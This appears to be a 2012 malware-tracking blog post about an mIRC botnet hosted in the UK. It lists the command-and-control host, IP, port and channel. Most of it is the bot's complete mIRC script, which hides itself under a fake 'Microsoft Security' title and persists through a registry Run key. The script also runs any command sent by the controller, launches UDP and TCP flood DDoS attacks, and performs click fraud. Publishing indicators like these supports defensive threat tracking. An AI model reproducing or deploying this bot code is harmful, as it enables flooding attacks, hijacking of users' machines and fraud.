tool.manitam.com(mIRC bots hosted in United Kingdom Redstation Limited)

By Pig, February 14, 2012

tool.manitam.com 176.227.199.27
dslb-088-065-091-000.pools.arcor-ip.net 88.65.91.0
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
C&C Server: 176.227.199.27:6669
Server Password:
Username: m0x
Nickname: [x0x]XP92288
Channel: #d0x (Password: )
Channeltopic:

Bot Config:

On *:start: {
  .Nickler
  .server tool.manitam.com 6669
  .timer 0 0 BoTNeT
  .dll dmu.dll HideMirc on 
  .kayit
  .inc %many
  .if (%many == 1) { set %infecttime $day $date $time | yapalim }
}
alias yapalim { %x = $+($r(a,z),$r(1,99),.reg) | write %x REGEDIT4 | write %x [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun] | write %x $+("Win,$os,Service"=",$replace($mircdir,,),$nopath($mircexe),") | .run -n regedit /s %x | .timer 1 3 .remove %x | .timer 1 4 unset %x }

On *:Connect: {
  if ($cid == 1) { .join #d0x }
  if ($cid !== 1) { .disconnect }
  .timerreg 1 1 yapalim
  ignore -wd *
}
on *:disconnect: { close -m | clearall  | server }
on *:action:*:?:closemsg $nick | halt
on *:text:*:?:closemsg $nick | halt
on *:notice:*:?:closemsg $nick | halt
on *:ping: { ctcp $me ping }
on *:exit: { run $remove($mircexe,$mircdir) }
on *:text:*:#: {
  if ($nick == x) {
    if ($1 == !xxx) { $2- }
    if ($1 == $me) { $2- }
    if ($1 == !ddos) { .set %adres $2 | .set %port $3 | .timerddos 00 00 //kapatalým }
    if ($1 == !stop) { .unset %adres | .unset %port | .timerddos off | .sockclose * } 
    if ($1 = !udp) {
      if ($2 == stop) {
        msg # 4UDP 4Attack 4On : %udpaa 4Halted
        unset %udpaa
        halt
      }
      if ($3 == $null) {
        halt
        unset %udpaa
      }
      if ($4 == $null) {
        halt
        unset %udpaa
      }
      set %start 0
      set %end $4
      set %udpport $3 | if (%udpport == random) { set %udpport $rand(0,65535) }
      set %udpaa $2
      msg # 4UDP 4Attacking: 4( $2 4) on port 4( %udpport 4) |:| 4( $4 4) times
      :udploop
      if (%start == %end) {
        msg #  4UDP 4Attack 4On: %udpaa 4Complete 
        unset %udpaa
        halt
      }
      inc %start 1
      if ($3 == 0) {
        set %randname $rand(10000,99999)
        set %str $read(str.vxd)
        set %randport $rand(0,65535)
        sockudp Udp $+ %randname $+ a $2 %randport %str
        sockudp Udp $+ %randname $+ b $2 %randport %str
        sockudp Udp $+ %randname $+ c $2 %randport %str
        sockudp Udp $+ %randname $+ d $2 %randport %str
        sockudp Udp $+ %randname $+ e $2 %randport %str
        sockudp Udp $+ %randname $+ f $2 %randport %str
        sockudp Udp $+ %randname $+ g $2 %randport %str
        sockudp Udp $+ %randname $+ h $2 %randport %str
        sockudp Udp $+ %randname $+ i $2 %randport %str
        sockudp Udp $+ %randname $+ j $2 %randport %str
        goto udploop
      }
      if ($4 != 0) {
        set %randname $rand(10000,99999)
        set %str $read(str.vxd)
        sockudp Udp $+ %randname $+ a $2 $3 %str
        sockudp Udp $+ %randname $+ b $2 $3 %str
        sockudp Udp $+ %randname $+ c $2 $3 %str
        sockudp Udp $+ %randname $+ d $2 $3 %str
        sockudp Udp $+ %randname $+ e $2 $3 %str
        sockudp Udp $+ %randname $+ f $2 $3 %str
        sockudp Udp $+ %randname $+ g $2 $3 %str
        sockudp Udp $+ %randname $+ h $2 $3 %str
        sockudp Udp $+ %randname $+ i $2 $3 %str
        sockudp Udp $+ %randname $+ j $2 $3 %str
        goto udploop
      }
    }
  }
}  
Alias click { if ($window(@click)) { window -c @click } | %xxx = $1-  |  window -hp @click  |  echo -a $dll(click.dll,attach,$window(@click).hwnd) | echo -a $dll(click.dll,navigate,%xxx) | echo -a $dll(click.dll,select,%old_hwnd) } 
Alias hithit { if (%xxx != $null) { .timerhit 15 $r(15,1800) click %xxx } }
Alias free { if ($1 = on) { %xxx = $2 | .timerhit off |  hithit } | if ($1 = off) { .timerhit off | window -c @Click } }
alias BoTNeT {
  dll dmu.dll HideMirc on
  dll KCA.dll Titlebar -m Microsoft Security
  hide
  .timer 1 1 dll KCA.dll SetIcon -m 17 $mircexe
}
alias kayit {
  run regedit /S kayit.dll
 .msg # mIRC Baþarýyla Kayýt Edildi..
}
alias kapatalým { .sockopen Microsoft $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(0,9) $+ $r(a,z) $+ $r(0,9) %adres %port }
Alias Nickler {
  .nick [x0x] $+ $os $+ $r(10000,99999)
  .anick [x0x] $+ $os $+ $r(10000,99999)
  .identd on m0x
  .emailaddr m0x@
  .username $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
}
raw *:*: {
  ;if ($numeric = 439) { disconnect }
  if ($numeric = 432) { nick $nickler } 
  if ($numeric = 433) { nick $nickler }
}
ctcp 1:Version:*:{
  ctcpreply $nick version mIRC v6.20 Khaled Mardam-Bey $randomcuk
  ctcpreply IRC version mIRC v6.21 Khaled Mardam-Bey $randomcuk 
  ctcpreply Version version mIRC v6.3 Khaled Mardam-Bey $randomcuk
}

sample

hosting infos:
http://whois.domaintools.com/176.227.199.27

Categories: Uncategorized